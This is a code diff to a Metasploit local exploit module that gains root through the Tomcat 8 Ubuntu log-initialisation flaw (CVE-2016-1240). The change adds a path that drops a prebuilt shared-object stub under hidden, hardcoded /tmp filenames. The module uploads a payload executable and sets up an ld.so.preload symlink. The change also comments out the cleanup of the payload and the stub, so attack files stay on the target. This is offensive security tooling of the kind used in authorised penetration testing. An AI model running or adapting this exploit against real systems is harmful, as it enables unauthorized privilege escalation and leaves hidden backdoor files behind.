tomcat 8 priv esc on ubuntu prebuilt so file

modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb

@@ -133,18 +133,28 @@ class MetasploitModule < Msf::Exploit::Local
     )
     print_good("Original #{catalina} backed up to #{path}")
 
+    if live_compile?
+      # upload our privesc stub
+      so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
+      so_stub_path = "#{base_dir}/#{so_stub}"
+      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+      # Upload exploit stub
+      vprint_status "Compiling exploit stub: #{so_stub_path}"
+      upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
+    else
+      payload_path = '/tmp/.jMeY5vToQl'
+      so_stub = '.ny9NyKEPJ.so'
+      so_stub_path = "/tmp/#{so_stub}"
+
+      write_file(so_stub_path, exploit_data('CVE-2016-1240', 'stub.so'))
+    end
     # Upload payload executable
-    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
     vprint_status("Uploading Payload to #{payload_path}")
     upload_and_chmodx payload_path, generate_payload_exe
-    register_file_for_cleanup(payload_path)
+    # register_file_for_cleanup(payload_path)
 
-    # upload our privesc stub
-    so_stub = ".#{rand_text_alphanumeric(5..10)}.so"
-    so_stub_path = "#{base_dir}/#{so_stub}"
-    vprint_status "Compiling exploit stub: #{so_stub_path}"
-    upload_and_compile so_stub_path, strip_comments(exploit_data('CVE-2016-1240', 'privesc_preload.c').gsub('$BACKDOORPATH', payload_path)), '-Wall -fPIC -shared -ldl'
-    register_file_for_cleanup(so_stub_path)
+    # register_file_for_cleanup(so_stub_path)
 
     # delete the log and symlink ld.so.preload
     vprint_status("Deleting #{catalina}")